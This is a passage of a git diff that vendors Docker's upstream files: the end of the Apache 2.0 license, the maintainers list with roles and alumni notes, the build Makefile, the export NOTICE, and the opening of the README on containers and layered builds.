+      "Derivative Works" shall mean any work, whether in Source or Object
+      form, that is based on (or derived from) the Work and for which the
+      editorial revisions, annotations, elaborations, or other modifications
+      represent, as a whole, an original work of authorship. For the purposes
+      of this License, Derivative Works shall not include works that remain
+      separable from, or merely link (or bind by name) to the interfaces of,
+      the Work and Derivative Works thereof.
+
+      "Contribution" shall mean any work of authorship, including
+      the original version of the Work and any modifications or additions
+      to that Work or Derivative Works thereof, that is intentionally
+      submitted to Licensor for inclusion in the Work by the copyright owner
+      or by an individual or Legal Entity authorized to submit on behalf of
+      the copyright owner. For the purposes of this definition, "submitted"
+      means any form of electronic, verbal, or written communication sent
+      to the Licensor or its representatives, including but not limited to
+      communication on electronic mailing lists, source code control systems,
+      and issue tracking systems that are managed by, or on behalf of, the
+      Licensor for the purpose of discussing and improving the Work, but
+      excluding communication that is conspicuously marked or otherwise
+      designated in writing by the copyright owner as "Not a Contribution."
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity
+      on behalf of whom a Contribution has been received by Licensor and
+      subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      copyright license to reproduce, prepare Derivative Works of,
+      publicly display, publicly perform, sublicense, and distribute the
+      Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      (except as stated in this section) patent license to make, have made,
+      use, offer to sell, sell, import, and otherwise transfer the Work,
+      where such license applies only to those patent claims licensable
+      by such Contributor that are necessarily infringed by their
+      Contribution(s) alone or by combination of their Contribution(s)
+      with the Work to which such Contribution(s) was submitted. If You
+      institute patent litigation against any entity (including a
+      cross-claim or counterclaim in a lawsuit) alleging that the Work
+      or a Contribution incorporated within the Work constitutes direct
+      or contributory patent infringement, then any patent licenses
+      granted to You under this License for that Work shall terminate
+      as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the
+      Work or Derivative Works thereof in any medium, with or without
+      modifications, and in Source or Object form, provided that You
+      meet the following conditions:
+
+      (a) You must give any other recipients of the Work or
+          Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices
+          stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works
+          that You distribute, all copyright, patent, trademark, and
+          attribution notices from the Source form of the Work,
+          excluding those notices that do not pertain to any part of
+          the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its
+          distribution, then any Derivative Works that You distribute must
+          include a readable copy of the attribution notices contained
+          within such NOTICE file, excluding those notices that do not
+          pertain to any part of the Derivative Works, in at least one
+          of the following places: within a NOTICE text file distributed
+          as part of the Derivative Works; within the Source form or
+          documentation, if provided along with the Derivative Works; or,
+          within a display generated by the Derivative Works, if and
+          wherever such third-party notices normally appear. The contents
+          of the NOTICE file are for informational purposes only and
+          do not modify the License. You may add Your own attribution
+          notices within Derivative Works that You distribute, alongside
+          or as an addendum to the NOTICE text from the Work, provided
+          that such additional attribution notices cannot be construed
+          as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and
+      may provide additional or different license terms and conditions
+      for use, reproduction, or distribution of Your modifications, or
+      for any such Derivative Works as a whole, provided Your use,
+      reproduction, and distribution of the Work otherwise complies with
+      the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise,
+      any Contribution intentionally submitted for inclusion in the Work
+      by You to the Licensor shall be under the terms and conditions of
+      this License, without any additional terms or conditions.
+      Notwithstanding the above, nothing herein shall supersede or modify
+      the terms of any separate license agreement you may have executed
+      with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade
+      names, trademarks, service marks, or product names of the Licensor,
+      except as required for reasonable and customary use in describing the
+      origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or
+      agreed to in writing, Licensor provides the Work (and each
+      Contributor provides its Contributions) on an "AS IS" BASIS,
+      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+      implied, including, without limitation, any warranties or conditions
+      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+      PARTICULAR PURPOSE. You are solely responsible for determining the
+      appropriateness of using or redistributing the Work and assume any
+      risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory,
+      whether in tort (including negligence), contract, or otherwise,
+      unless required by applicable law (such as deliberate and grossly
+      negligent acts) or agreed to in writing, shall any Contributor be
+      liable to You for damages, including any direct, indirect, special,
+      incidental, or consequential damages of any character arising as a
+      result of this License or out of the use or inability to use the
+      Work (including but not limited to damages for loss of goodwill,
+      work stoppage, computer failure or malfunction, or any and all
+      other commercial damages or losses), even if such Contributor
+      has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing
+      the Work or Derivative Works thereof, You may choose to offer,
+      and charge a fee for, acceptance of support, warranty, indemnity,
+      or other liability obligations and/or rights consistent with this
+      License. However, in accepting such obligations, You may act only
+      on Your own behalf and on Your sole responsibility, not on behalf
+      of any other Contributor, and only if You agree to indemnify,
+      defend, and hold each Contributor harmless for any liability
+      incurred by, or claims asserted against, such Contributor by reason
+      of your accepting any such warranty or additional liability.
+
+   END OF TERMS AND CONDITIONS
+
+   Copyright 2013-2016 Docker, Inc.
+
+   Licensed under the Apache License, Version 2.0 (the "License");
+   you may not use this file except in compliance with the License.
+   You may obtain a copy of the License at
+
+       https://www.apache.org/licenses/LICENSE-2.0
+
+   Unless required by applicable law or agreed to in writing, software
+   distributed under the License is distributed on an "AS IS" BASIS,
+   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+   See the License for the specific language governing permissions and
+   limitations under the License.
diff --git a/vendor/github.com/docker/docker/MAINTAINERS b/vendor/github.com/docker/docker/MAINTAINERS
new file mode 100644
index 0000000000..39bb8c1308
--- /dev/null
+++ b/vendor/github.com/docker/docker/MAINTAINERS
@@ -0,0 +1,376 @@
+# Docker maintainers file
+#
+# This file describes who runs the docker/docker project and how.
+# This is a living document - if you see something out of date or missing, speak up!
+#
+# It is structured to be consumable by both humans and programs.
+# To extract its contents programmatically, use any TOML-compliant
+# parser.
+#
+# This file is compiled into the MAINTAINERS file in docker/opensource.
+#
+[Org]
+
+	[Org."Core maintainers"]
+
+	# The Core maintainers are the ghostbusters of the project: when there's a problem others
+	# can't solve, they show up and fix it with bizarre devices and weaponry.
+	# They have final say on technical implementation and coding style.
+	# They are ultimately responsible for quality in all its forms: usability polish,
+	# bugfixes, performance, stability, etc. When ownership  can cleanly be passed to
+	# a subsystem, they are responsible for doing so and holding the
+	# subsystem maintainers accountable. If ownership is unclear, they are the de facto owners.
+
+	# For each release (including minor releases), a "release captain" is assigned from the
+	# pool of core maintainers. Rotation is encouraged across all maintainers, to ensure
+	# the release process is clear and up-to-date.
+
+		people = [
+			"aaronlehmann",
+			"akihirosuda",
+			"aluzzardi",
+			"anusha",
+			"coolljt0725",
+			"cpuguy83",
+			"crosbymichael",
+			"dnephin",
+			"duglin",
+			"estesp",
+			"icecrime",
+			"jhowardmsft",
+			"justincormack",
+			"lk4d4",
+			"mavenugo",
+			"mhbauer",
+			"mlaventure",
+			"mrjana",
+			"runcom",
+			"stevvooe",
+			"tianon",
+			"tibor",
+			"tonistiigi",
+			"unclejack",
+			"vdemeester",
+			"vieux"
+		]
+
+	[Org."Docs maintainers"]
+
+	# TODO Describe the docs maintainers role.
+
+		people = [
+			"jamtur01",
+			"misty",
+			"sven",
+			"thajeztah"
+		]
+
+	[Org.Curators]
+
+	# The curators help ensure that incoming issues and pull requests are properly triaged and
+	# that our various contribution and reviewing processes are respected. With their knowledge of
+	# the repository activity, they can also guide contributors to relevant material or
+	# discussions.
+	#
+	# They are neither code nor docs reviewers, so they are never expected to merge. They can
+	# however:
+	# - close an issue or pull request when it's an exact duplicate
+	# - close an issue or pull request when it's inappropriate or off-topic
+
+		people = [
+			"aboch",
+			"andrewhsu",
+			"ehazlett",
+			"mgoelzer",
+			"programmerq",
+			"thajeztah"
+		]
+
+	[Org.Alumni]
+
+	# This list contains maintainers that are no longer active on the project.
+	# It is thanks to these people that the project has become what it is today.
+	# Thank you!
+
+		people = [
+			# David Calavera contributed many features to Docker, such as an improved
+			# event system, dynamic configuration reloading, volume plugins, fancy
+			# new templating options, and an external client credential store. As a
+			# maintainer, David was release captain for Docker 1.8, and competing
+			# with Jess Frazelle to be "top dream killer".
+			# David is now doing amazing stuff as CTO for https://www.netlify.com,
+			# and tweets as @calavera.
+			"calavera",
+
+			# As a maintainer, Erik was responsible for the "builder", and
+			# started the first designs for the new networking model in
+			# Docker. Erik is now working on all kinds of plugins for Docker
+			# (https://github.com/contiv) and various open source projects
+			# in his own repository https://github.com/erikh. You may
+			# still stumble into him in our issue tracker, or on IRC.
+			"erikh",
+
+			# Jessica Frazelle, also known as the "Keyser Söze of containers",
+			# runs *everything* in containers. She started contributing to
+			# Docker with a (fun fun) change involving both iptables and regular
+			# expressions (coz, YOLO!) on July 10, 2014
+			# https://github.com/docker/docker/pull/6950/commits/f3a68ffa390fb851115c77783fa4031f1d3b2995.
+			# Jess was Release Captain for Docker 1.4, 1.6 and 1.7, and contributed
+			# many features and improvement, among which "seccomp profiles" (making
+			# containers a lot more secure). Besides being a maintainer, she
+			# set up the CI infrastructure for the project, giving everyone
+			# something to shout at if a PR failed ("noooo Janky!").
+			# Jess is currently working on the DCOS security team at Mesosphere,
+			# and contributing to various open source projects.
+			# Be sure you don't miss her talks at a conference near you (a must-see),
+			# read her blog at https://blog.jessfraz.com (a must-read), and
+			# check out her open source projects on GitHub https://github.com/jessfraz (a must-try).
+			"jessfraz",
+
+			# As a docs maintainer, Mary Anthony contributed greatly to the Docker
+			# docs. She wrote the Docker Contributor Guide and Getting Started
+			# Guides. She helped create a doc build system independent of
+			# docker/docker project, and implemented a new docs.docker.com theme and
+			# nav for 2015 Dockercon. Fun fact: the most inherited layer in DockerHub
+			# public repositories was originally referenced in
+			# maryatdocker/docker-whale back in May 2015.
+			"moxiegirl",
+
+			# Vincent "vbatts!" Batts made his first contribution to the project
+			# in November 2013, to become a maintainer a few months later, on
+			# May 10, 2014 (https://github.com/docker/docker/commit/d6e666a87a01a5634c250358a94c814bf26cb778).
+			# As a maintainer, Vincent made important contributions to core elements
+			# of Docker, such as "distribution" (tarsum) and graphdrivers (btrfs, devicemapper).
+			# He also contributed the "tar-split" library, an important element
+			# for the content-addressable store.
+			# Vincent is currently a member of the Open Containers Initiative
+			# Technical Oversight Board (TOB), besides his work at Red Hat and
+			# Project Atomic. You can still find him regularly hanging out in
+			# our repository and the #docker-dev and #docker-maintainers IRC channels
+			# for a chat, as he's always a lot of fun.
+			"vbatts",
+
+			# Vishnu became a maintainer to help out on the daemon codebase and
+			# libcontainer integration. He's currently involved in the
+			# Open Containers Initiative, working on the specifications,
+			# besides his work on cAdvisor and Kubernetes for Google.
+			"vishh"
+		]
+
+[people]
+
+# A reference list of all people associated with the project.
+# All other sections should refer to people by their canonical key
+# in the people section.
+
+	# ADD YOURSELF HERE IN ALPHABETICAL ORDER
+
+	[people.aaronlehmann]
+	Name = "Aaron Lehmann"
+	Email = "aaron.lehmann@docker.com"
+	GitHub = "aaronlehmann"
+
+	[people.aboch]
+	Name = "Alessandro Boch"
+	Email = "aboch@docker.com"
+	GitHub = "aboch"
+
+	[people.akihirosuda]
+	Name = "Akihiro Suda"
+	Email = "suda.akihiro@lab.ntt.co.jp"
+	GitHub = "AkihiroSuda"
+
+	[people.aluzzardi]
+	Name = "Andrea Luzzardi"
+	Email = "al@docker.com"
+	GitHub = "aluzzardi"
+
+	[people.andrewhsu]
+	Name = "Andrew Hsu"
+	Email = "andrewhsu@docker.com"
+	GitHub = "andrewhsu"
+
+	[people.anusha]
+	Name = "Anusha Ragunathan"
+	Email = "anusha@docker.com"
+	GitHub = "anusha-ragunathan"
+
+	[people.calavera]
+	Name = "David Calavera"
+	Email = "david.calavera@gmail.com"
+	GitHub = "calavera"
+
+	[people.coolljt0725]
+	Name = "Lei Jitang"
+	Email = "leijitang@huawei.com"
+	GitHub = "coolljt0725"
+
+	[people.cpuguy83]
+	Name = "Brian Goff"
+	Email = "cpuguy83@gmail.com"
+	Github = "cpuguy83"
+
+	[people.crosbymichael]
+	Name = "Michael Crosby"
+	Email = "crosbymichael@gmail.com"
+	GitHub = "crosbymichael"
+
+	[people.dnephin]
+	Name = "Daniel Nephin"
+	Email = "dnephin@gmail.com"
+	GitHub = "dnephin"
+
+	[people.duglin]
+	Name = "Doug Davis"
+	Email = "dug@us.ibm.com"
+	GitHub = "duglin"
+
+	[people.ehazlett]
+	Name = "Evan Hazlett"
+	Email = "ejhazlett@gmail.com"
+	GitHub = "ehazlett"
+
+	[people.erikh]
+	Name = "Erik Hollensbe"
+	Email = "erik@docker.com"
+	GitHub = "erikh"
+
+	[people.estesp]
+	Name = "Phil Estes"
+	Email = "estesp@linux.vnet.ibm.com"
+	GitHub = "estesp"
+
+	[people.icecrime]
+	Name = "Arnaud Porterie"
+	Email = "arnaud@docker.com"
+	GitHub = "icecrime"
+
+	[people.jamtur01]
+	Name = "James Turnbull"
+	Email = "james@lovedthanlost.net"
+	GitHub = "jamtur01"
+
+	[people.jhowardmsft]
+	Name = "John Howard"
+	Email = "jhoward@microsoft.com"
+	GitHub = "jhowardmsft"
+
+	[people.jessfraz]
+	Name = "Jessie Frazelle"
+	Email = "jess@linux.com"
+	GitHub = "jessfraz"
+
+	[people.justincormack]
+	Name = "Justin Cormack"
+	Email = "justin.cormack@docker.com"
+	GitHub = "justincormack"
+
+	[people.lk4d4]
+	Name = "Alexander Morozov"
+	Email = "lk4d4@docker.com"
+	GitHub = "lk4d4"
+
+	[people.mavenugo]
+	Name = "Madhu Venugopal"
+	Email = "madhu@docker.com"
+	GitHub = "mavenugo"
+
+	[people.mgoelzer]
+	Name = "Mike Goelzer"
+	Email = "mike.goelzer@docker.com"
+	GitHub = "mgoelzer"
+
+	[people.mhbauer]
+	Name = "Morgan Bauer"
+	Email = "mbauer@us.ibm.com"
+	GitHub = "mhbauer"
+
+	[people.misty]
+	Name = "Misty Stanley-Jones"
+	Email = "misty@docker.com"
+	GitHub = "mstanleyjones"
+
+	[people.mlaventure]
+	Name = "Kenfe-Mickaël Laventure"
+	Email = "mickael.laventure@docker.com"
+	GitHub = "mlaventure"
+
+	[people.moxiegirl]
+	Name = "Mary Anthony"
+	Email = "mary.anthony@docker.com"
+	GitHub = "moxiegirl"
+
+	[people.mrjana]
+	Name = "Jana Radhakrishnan"
+	Email = "mrjana@docker.com"
+	GitHub = "mrjana"
+
+	[people.programmerq]
+	Name = "Jeff Anderson"
+	Email = "jeff@docker.com"
+	GitHub = "programmerq"
+
+	[people.runcom]
+	Name = "Antonio Murdaca"
+	Email = "runcom@redhat.com"
+	GitHub = "runcom"
+
+	[people.shykes]
+	Name = "Solomon Hykes"
+	Email = "solomon@docker.com"
+	GitHub = "shykes"
+
+	[people.stevvooe]
+	Name = "Stephen Day"
+	Email = "stephen.day@docker.com"
+	GitHub = "stevvooe"
+
+	[people.sven]
+	Name = "Sven Dowideit"
+	Email = "SvenDowideit@home.org.au"
+	GitHub = "SvenDowideit"
+
+	[people.thajeztah]
+	Name = "Sebastiaan van Stijn"
+	Email = "github@gone.nl"
+	GitHub = "thaJeztah"
+
+	[people.tianon]
+	Name = "Tianon Gravi"
+	Email = "admwiggin@gmail.com"
+	GitHub = "tianon"
+
+	[people.tibor]
+	Name = "Tibor Vass"
+	Email = "tibor@docker.com"
+	GitHub = "tiborvass"
+
+	[people.tonistiigi]
+	Name = "Tõnis Tiigi"
+	Email = "tonis@docker.com"
+	GitHub = "tonistiigi"
+
+	[people.unclejack]
+	Name = "Cristian Staretu"
+	Email = "cristian.staretu@gmail.com"
+	GitHub = "unclejack"
+
+	[people.vbatts]
+	Name = "Vincent Batts"
+	Email = "vbatts@redhat.com"
+	GitHub = "vbatts"
+
+	[people.vdemeester]
+	Name = "Vincent Demeester"
+	Email = "vincent@sbr.pm"
+	GitHub = "vdemeester"
+
+	[people.vieux]
+	Name = "Victor Vieux"
+	Email = "vieux@docker.com"
+	GitHub = "vieux"
+
+	[people.vishh]
+	Name = "Vishnu Kannan"
+	Email = "vishnuk@google.com"
+	GitHub = "vishh"
diff --git a/vendor/github.com/docker/docker/Makefile b/vendor/github.com/docker/docker/Makefile
new file mode 100644
index 0000000000..81bde6b4f6
--- /dev/null
+++ b/vendor/github.com/docker/docker/Makefile
@@ -0,0 +1,147 @@
+.PHONY: all binary build cross deb help init-go-pkg-cache install manpages rpm run shell test test-docker-py test-integration-cli test-unit tgz validate win
+
+# set the graph driver as the current graphdriver if not set
+DOCKER_GRAPHDRIVER := $(if $(DOCKER_GRAPHDRIVER),$(DOCKER_GRAPHDRIVER),$(shell docker info 2>&1 | grep "Storage Driver" | sed 's/.*: //'))
+
+# get OS/Arch of docker engine
+DOCKER_OSARCH := $(shell bash -c 'source hack/make/.detect-daemon-osarch && echo $${DOCKER_ENGINE_OSARCH:-$$DOCKER_CLIENT_OSARCH}')
+DOCKERFILE := $(shell bash -c 'source hack/make/.detect-daemon-osarch && echo $${DOCKERFILE}')
+
+# env vars passed through directly to Docker's build scripts
+# to allow things like `make KEEPBUNDLE=1 binary` easily
+# `project/PACKAGERS.md` have some limited documentation of some of these
+DOCKER_ENVS := \
+	-e BUILD_APT_MIRROR \
+	-e BUILDFLAGS \
+	-e KEEPBUNDLE \
+	-e DOCKER_BUILD_ARGS \
+	-e DOCKER_BUILD_GOGC \
+	-e DOCKER_BUILD_PKGS \
+	-e DOCKER_DEBUG \
+	-e DOCKER_EXPERIMENTAL \
+	-e DOCKER_GITCOMMIT \
+	-e DOCKER_GRAPHDRIVER=$(DOCKER_GRAPHDRIVER) \
+	-e DOCKER_INCREMENTAL_BINARY \
+	-e DOCKER_PORT \
+	-e DOCKER_REMAP_ROOT \
+	-e DOCKER_STORAGE_OPTS \
+	-e DOCKER_USERLANDPROXY \
+	-e TESTDIRS \
+	-e TESTFLAGS \
+	-e TIMEOUT \
+	-e HTTP_PROXY \
+	-e HTTPS_PROXY \
+	-e NO_PROXY \
+	-e http_proxy \
+	-e https_proxy \
+	-e no_proxy
+# note: we _cannot_ add "-e DOCKER_BUILDTAGS" here because even if it's unset in the shell, that would shadow the "ENV DOCKER_BUILDTAGS" set in our Dockerfile, which is very important for our official builds
+
+# to allow `make BIND_DIR=. shell` or `make BIND_DIR= test`
+# (default to no bind mount if DOCKER_HOST is set)
+# note: BINDDIR is supported for backwards-compatibility here
+BIND_DIR := $(if $(BINDDIR),$(BINDDIR),$(if $(DOCKER_HOST),,bundles))
+DOCKER_MOUNT := $(if $(BIND_DIR),-v "$(CURDIR)/$(BIND_DIR):/go/src/github.com/docker/docker/$(BIND_DIR)")
+
+# This allows the test suite to be able to run without worrying about the underlying fs used by the container running the daemon (e.g. aufs-on-aufs), so long as the host running the container is running a supported fs.
+# The volume will be cleaned up when the container is removed due to `--rm`.
+# Note that `BIND_DIR` will already be set to `bundles` if `DOCKER_HOST` is not set (see above BIND_DIR line), in such case this will do nothing since `DOCKER_MOUNT` will already be set.
+DOCKER_MOUNT := $(if $(DOCKER_MOUNT),$(DOCKER_MOUNT),-v /go/src/github.com/docker/docker/bundles)
+
+# enable .go-pkg-cache if DOCKER_INCREMENTAL_BINARY and DOCKER_MOUNT (i.e.DOCKER_HOST) are set
+PKGCACHE_DIR := $(if $(PKGCACHE_DIR),$(PKGCACHE_DIR),.go-pkg-cache)
+PKGCACHE_MAP := gopath:/go/pkg goroot-linux_amd64_netgo:/usr/local/go/pkg/linux_amd64_netgo
+DOCKER_MOUNT := $(if $(DOCKER_INCREMENTAL_BINARY),$(DOCKER_MOUNT) $(shell echo $(PKGCACHE_MAP) | sed -E 's@([^ ]*)@-v "$(CURDIR)/$(PKGCACHE_DIR)/\1"@g'),$(DOCKER_MOUNT))
+
+GIT_BRANCH := $(shell git rev-parse --abbrev-ref HEAD 2>/dev/null)
+GIT_BRANCH_CLEAN := $(shell echo $(GIT_BRANCH) | sed -e "s/[^[:alnum:]]/-/g")
+DOCKER_IMAGE := docker-dev$(if $(GIT_BRANCH_CLEAN),:$(GIT_BRANCH_CLEAN))
+DOCKER_PORT_FORWARD := $(if $(DOCKER_PORT),-p "$(DOCKER_PORT)",)
+
+DOCKER_FLAGS := docker run --rm -i --privileged $(DOCKER_ENVS) $(DOCKER_MOUNT) $(DOCKER_PORT_FORWARD)
+BUILD_APT_MIRROR := $(if $(DOCKER_BUILD_APT_MIRROR),--build-arg APT_MIRROR=$(DOCKER_BUILD_APT_MIRROR))
+export BUILD_APT_MIRROR
+
+# if this session isn't interactive, then we don't want to allocate a
+# TTY, which would fail, but if it is interactive, we do want to attach
+# so that the user can send e.g. ^C through.
+INTERACTIVE := $(shell [ -t 0 ] && echo 1 || echo 0)
+ifeq ($(INTERACTIVE), 1)
+	DOCKER_FLAGS += -t
+endif
+
+DOCKER_RUN_DOCKER := $(DOCKER_FLAGS) "$(DOCKER_IMAGE)"
+
+default: binary
+
+all: build ## validate all checks, build linux binaries, run all tests\ncross build non-linux binaries and generate archives
+	$(DOCKER_RUN_DOCKER) bash -c 'hack/validate/default && hack/make.sh'
+
+binary: build ## build the linux binaries
+	$(DOCKER_RUN_DOCKER) hack/make.sh binary
+
+build: bundles init-go-pkg-cache
+	docker build ${BUILD_APT_MIRROR} ${DOCKER_BUILD_ARGS} -t "$(DOCKER_IMAGE)" -f "$(DOCKERFILE)" .
+
+bundles:
+	mkdir bundles
+
+cross: build ## cross build the binaries for darwin, freebsd and\nwindows
+	$(DOCKER_RUN_DOCKER) hack/make.sh dynbinary binary cross
+
+deb: build  ## build the deb packages
+	$(DOCKER_RUN_DOCKER) hack/make.sh dynbinary build-deb
+
+
+help: ## this help
+	@awk 'BEGIN {FS = ":.*?## "} /^[a-zA-Z_-]+:.*?## / {sub("\\\\n",sprintf("\n%22c"," "), $$2);printf "\033[36m%-20s\033[0m %s\n", $$1, $$2}' $(MAKEFILE_LIST)
+
+init-go-pkg-cache:
+	mkdir -p $(shell echo $(PKGCACHE_MAP) | sed -E 's@([^: ]*):[^ ]*@$(PKGCACHE_DIR)/\1@g')
+
+install: ## install the linux binaries
+	KEEPBUNDLE=1 hack/make.sh install-binary
+
+manpages: ## Generate man pages from go source and markdown
+	docker build -t docker-manpage-dev -f "man/$(DOCKERFILE)" ./man
+	docker run --rm \
+		-v $(PWD):/go/src/github.com/docker/docker/ \
+		docker-manpage-dev
+
+rpm: build ## build the rpm packages
+	$(DOCKER_RUN_DOCKER) hack/make.sh dynbinary build-rpm
+
+run: build ## run the docker daemon in a container
+	$(DOCKER_RUN_DOCKER) sh -c "KEEPBUNDLE=1 hack/make.sh install-binary run"
+
+shell: build ## start a shell inside the build env
+	$(DOCKER_RUN_DOCKER) bash
+
+test: build ## run the unit, integration and docker-py tests
+	$(DOCKER_RUN_DOCKER) hack/make.sh dynbinary cross test-unit test-integration-cli test-docker-py
+
+test-docker-py: build ## run the docker-py tests
+	$(DOCKER_RUN_DOCKER) hack/make.sh dynbinary test-docker-py
+
+test-integration-cli: build ## run the integration tests
+	$(DOCKER_RUN_DOCKER) hack/make.sh build-integration-test-binary dynbinary test-integration-cli
+
+test-unit: build ## run the unit tests
+	$(DOCKER_RUN_DOCKER) hack/make.sh test-unit
+
+tgz: build ## build the archives (.zip on windows and .tgz\notherwise) containing the binaries
+	$(DOCKER_RUN_DOCKER) hack/make.sh dynbinary binary cross tgz
+
+validate: build ## validate DCO, Seccomp profile generation, gofmt,\n./pkg/ isolation, golint, tests, tomls, go vet and vendor
+	$(DOCKER_RUN_DOCKER) hack/validate/all
+
+win: build ## cross build the binary for windows
+	$(DOCKER_RUN_DOCKER) hack/make.sh win
+
+.PHONY: swagger-gen
+swagger-gen:
+	docker run --rm -v $(PWD):/go/src/github.com/docker/docker \
+		-w /go/src/github.com/docker/docker \
+		--entrypoint hack/generate-swagger-api.sh \
+		-e GOPATH=/go \
+		quay.io/goswagger/swagger:0.7.4
diff --git a/vendor/github.com/docker/docker/NOTICE b/vendor/github.com/docker/docker/NOTICE
new file mode 100644
index 0000000000..8a37c1c7bc
--- /dev/null
+++ b/vendor/github.com/docker/docker/NOTICE
@@ -0,0 +1,19 @@
+Docker
+Copyright 2012-2016 Docker, Inc.
+
+This product includes software developed at Docker, Inc. (https://www.docker.com).
+
+This product contains software (https://github.com/kr/pty) developed
+by Keith Rarick, licensed under the MIT License.
+
+The following is courtesy of our legal counsel:
+
+
+Use and transfer of Docker may be subject to certain restrictions by the
+United States and other governments.
+It is your responsibility to ensure that your use and/or transfer does not
+violate applicable laws.
+
+For more information, please see https://www.bis.doc.gov
+
+See also https://www.apache.org/dev/crypto.html and/or seek legal counsel.
diff --git a/vendor/github.com/docker/docker/README.md b/vendor/github.com/docker/docker/README.md
new file mode 100644
index 0000000000..0b33bdca0d
--- /dev/null
+++ b/vendor/github.com/docker/docker/README.md
@@ -0,0 +1,304 @@
+Docker: the container engine [![Release](https://img.shields.io/github/release/docker/docker.svg)](https://github.com/docker/docker/releases/latest)
+============================
+
+Docker is an open source project to pack, ship and run any application
+as a lightweight container.
+
+Docker containers are both *hardware-agnostic* and *platform-agnostic*.
+This means they can run anywhere, from your laptop to the largest
+cloud compute instance and everything in between - and they don't require
+you to use a particular language, framework or packaging system. That
+makes them great building blocks for deploying and scaling web apps,
+databases, and backend services without depending on a particular stack
+or provider.
+
+Docker began as an open-source implementation of the deployment engine which
+powered [dotCloud](http://web.archive.org/web/20130530031104/https://www.dotcloud.com/),
+a popular Platform-as-a-Service. It benefits directly from the experience
+accumulated over several years of large-scale operation and support of hundreds
+of thousands of applications and databases.
+
+![Docker logo](docs/static_files/docker-logo-compressed.png "Docker")
+
+## Security Disclosure
+
+Security is very important to us. If you have any issue regarding security,
+please disclose the information responsibly by sending an email to
+security@docker.com and not by creating a GitHub issue.
+
+## Better than VMs
+
+A common method for distributing applications and sandboxing their
+execution is to use virtual machines, or VMs. Typical VM formats are
+VMware's vmdk, Oracle VirtualBox's vdi, and Amazon EC2's ami. In theory
+these formats should allow every developer to automatically package
+their application into a "machine" for easy distribution and deployment.
+In practice, that almost never happens, for a few reasons:
+
+  * *Size*: VMs are very large which makes them impractical to store
+     and transfer.
+  * *Performance*: running VMs consumes significant CPU and memory,
+    which makes them impractical in many scenarios, for example local
+    development of multi-tier applications, and large-scale deployment
+    of cpu and memory-intensive applications on large numbers of
+    machines.
+  * *Portability*: competing VM environments don't play well with each
+     other. Although conversion tools do exist, they are limited and
+     add even more overhead.
+  * *Hardware-centric*: VMs were designed with machine operators in
+    mind, not software developers. As a result, they offer very
+    limited tooling for what developers need most: building, testing
+    and running their software. For example, VMs offer no facilities
+    for application versioning, monitoring, configuration, logging or
+    service discovery.
+
+By contrast, Docker relies on a different sandboxing method known as
+*containerization*. Unlike traditional virtualization, containerization
+takes place at the kernel level. Most modern operating system kernels
+now support the primitives necessary for containerization, including
+Linux with [openvz](https://openvz.org),
+[vserver](http://linux-vserver.org) and more recently
+[lxc](https://linuxcontainers.org/), Solaris with
+[zones](https://docs.oracle.com/cd/E26502_01/html/E29024/preface-1.html#scrolltoc),
+and FreeBSD with
+[Jails](https://www.freebsd.org/doc/handbook/jails.html).
+
+Docker builds on top of these low-level primitives to offer developers a
+portable format and runtime environment that solves all four problems.
+Docker containers are small (and their transfer can be optimized with
+layers), they have basically zero memory and cpu overhead, they are
+completely portable, and are designed from the ground up with an
+application-centric design.
+
+Perhaps best of all, because Docker operates at the OS level, it can still be
+run inside a VM!
+
+## Plays well with others
+
+Docker does not require you to buy into a particular programming
+language, framework, packaging system, or configuration language.
+
+Is your application a Unix process? Does it use files, tcp connections,
+environment variables, standard Unix streams and command-line arguments
+as inputs and outputs? Then Docker can run it.
+
+Can your application's build be expressed as a sequence of such
+commands? Then Docker can build it.
+
+## Escape dependency hell
+
+A common problem for developers is the difficulty of managing all
+their application's dependencies in a simple and automated way.
+
+This is usually difficult for several reasons:
+
+  * *Cross-platform dependencies*. Modern applications often depend on
+    a combination of system libraries and binaries, language-specific
+    packages, framework-specific modules, internal components
+    developed for another project, etc. These dependencies live in
+    different "worlds" and require different tools - these tools
+    typically don't work well with each other, requiring awkward
+    custom integrations.
+
+  * *Conflicting dependencies*. Different applications may depend on
+    different versions of the same dependency. Packaging tools handle
+    these situations with various degrees of ease - but they all
+    handle them in different and incompatible ways, which again forces
+    the developer to do extra work.
+
+  * *Custom dependencies*. A developer may need to prepare a custom
+    version of their application's dependency. Some packaging systems
+    can handle custom versions of a dependency, others can't - and all
+    of them handle it differently.
+
+
+Docker solves the problem of dependency hell by giving the developer a simple
+way to express *all* their application's dependencies in one place, while
+streamlining the process of assembling them. If this makes you think of
+[XKCD 927](https://xkcd.com/927/), don't worry. Docker doesn't
+*replace* your favorite packaging systems. It simply orchestrates
+their use in a simple and repeatable way. How does it do that? With
+layers.
+
+Docker defines a build as running a sequence of Unix commands, one
+after the other, in the same container. Build commands modify the
+contents of the container (usually by installing new files on the
+filesystem), the next command modifies it some more, etc. Since each
+build command inherits the result of the previous commands, the
+*order* in which the commands are executed expresses *dependencies*.
+
+Here's a typical Docker build process:
+
+```bash
+FROM ubuntu:12.04
+RUN apt-get update && apt-get install -y python python-pip curl
+RUN curl -sSL https://github.com/shykes/helloflask/archive/master.tar.gz | tar -xzv
+RUN cd helloflask-master && pip install -r requirements.txt
+```
+
+Note that Docker doesn't care *how* dependencies are built - as long
